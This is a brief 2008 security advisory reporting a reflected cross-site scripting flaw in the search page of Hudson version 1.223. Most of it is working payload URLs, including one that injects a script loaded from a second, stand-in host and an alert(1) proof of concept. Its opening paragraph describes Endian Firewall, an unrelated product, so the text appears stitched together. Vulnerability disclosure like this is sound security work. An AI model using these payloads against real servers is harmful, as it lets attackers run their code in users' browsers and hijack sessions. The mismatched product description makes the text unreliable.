#Security Advisory - Multiple Vulnerabilities in hudson# 

Endian Firewall is a "turn-key" linux security distribution that turns every system into a full featured security appliance. It features stateful packet filtering, proxies, antivirus/antispam, content filtering and a VPN module.

Date            : July-11-2008
Product         : hudson
Version         : 1.223 - Prior version maybe also be affected
Vendor          : https://hudson.dev.java.net/
Author          : syniack
Contact         : syniack@gmail.com


XSS Vulnerability: [TESTED]

Security issue in the following file:

hudson/search/?q=xss

Example:

http://www.example.com/hudson/search/?q="><scriptsrc=http://www.example2.com/re.js></script>

http://www.example.com/hudson/search/?q="><script>alert(1);</script>

Image URL:
http://img81.imageshack.us/my.php?image=hudsongq2.jpg